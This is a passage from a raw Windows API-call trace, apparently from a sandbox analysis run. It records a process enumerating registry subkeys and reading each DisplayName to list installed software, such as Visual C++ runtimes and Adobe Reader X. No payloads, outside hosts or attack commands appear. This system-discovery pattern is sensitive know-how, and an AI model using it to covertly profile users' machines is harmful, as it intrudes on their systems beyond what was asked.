lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.603] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.603] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.603] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7e | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.603] wcslen (_String="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161") returned 0x3e [0047.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0047.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", cchWideChar=62, lpMultiByteStr=0x261fbf8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpUsedDefaultChar=0x0) returned 62 [0047.603] strlen (_Str="{9BE518E6-ECC6-35A9-88E4-87755C07200F}") returned 0x26 [0047.603] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.603] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1f, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.603] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.603] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x26) returned 0x0 [0047.604] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x262d6c0, lpcbData=0x59ffd3c*=0x26 | out: lpType=0x0, lpData=0x262d6c0*=0x41, lpcbData=0x59ffd3c*=0x26) returned 0x0 [0047.604] wcslen (_String="Adobe Reader X MUI") returned 0x12 [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Reader X MUI", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adobe Reader X MUI", cchWideChar=18, lpMultiByteStr=0x2601290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adobe Reader X MUI", lpUsedDefaultChar=0x0) returned 18 [0047.604] strlen (_Str="{AC76BA86-7AD7-FFFF-7B44-AA0000000001}") returned 0x26 [0047.604] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.604] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x20, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.604] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.604] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.604] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.604] wcslen (_String="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned 0x3d [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", cchWideChar=61, lpMultiByteStr=0x261fa90, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpUsedDefaultChar=0x0) returned 61 [0047.604] strlen (_Str="{B175520C-86A2-35A7-8619-86DC379688B9}") returned 0x26 [0047.604] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.604] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x21, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.604] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.604] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.604] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x76 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x76) returned 0x0 [0047.604] wcslen (_String="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned 0x3a [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0047.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", cchWideChar=58, lpMultiByteStr=0x261fc40, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpUsedDefaultChar=0x0) returned 58 [0047.604] strlen (_Str="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}") returned 0x26 [0047.604] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.604] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x22, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.605] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7a | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.605] wcslen (_String="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned 0x3c [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", cchWideChar=60, lpMultiByteStr=0x261fbb0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpUsedDefaultChar=0x0) returned 60 [0047.605] strlen (_Str="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 0x26 [0047.605] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.605] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x23, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e52a6842-b0ac-476e-b48f-378a97a67346}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.605] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{e52a6842-b0ac-476e-b48f-378a97a67346}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.605] wcslen (_String="Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25017") returned 0x3d [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25017", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25017", cchWideChar=61, lpMultiByteStr=0x261fa00, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25017", lpUsedDefaultChar=0x0) returned 61 [0047.605] strlen (_Str="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 0x26 [0047.605] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.605] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x24, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.605] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.605] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7a | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7a) returned 0x0 [0047.605] wcslen (_String="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501") returned 0x3c [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0047.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", cchWideChar=60, lpMultiByteStr=0x261fad8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501", lpUsedDefaultChar=0x0) returned 60 [0047.606] strlen (_Str="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 0x26 [0047.606] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.606] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x25, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.606] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.606] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.606] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x78 | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.606] wcslen (_String="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219") returned 0x3b [0047.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0047.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", cchWideChar=59, lpMultiByteStr=0x261fb20, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219", lpUsedDefaultChar=0x0) returned 59 [0047.606] strlen (_Str="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}") returned 0x26 [0047.606] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.606] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x26, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.606] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.606] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.606] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.606] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x27, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.606] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.606] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.606] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.606] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x28, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.606] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.606] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.607] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.607] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x29, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.607] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.607] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.607] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.607] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2a, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.607] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.607] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.607] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.607] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2b, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.607] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.607] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.607] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.607] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2c, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.607] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.607] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.607] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.607] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2d, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.607] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{f325f05b-f963-4640-a43b-c8a494cdda0f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.607] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.608] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.608] wcslen (_String="Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017") returned 0x3d [0047.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017", cchWideChar=61, lpMultiByteStr=0x261fa48, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25017", lpUsedDefaultChar=0x0) returned 61 [0047.608] strlen (_Str="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 0x26 [0047.608] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.608] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2e, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.608] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.608] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.608] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.608] wcslen (_String="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned 0x3d [0047.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", cchWideChar=61, lpMultiByteStr=0x261f9b8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpUsedDefaultChar=0x0) returned 61 [0047.608] strlen 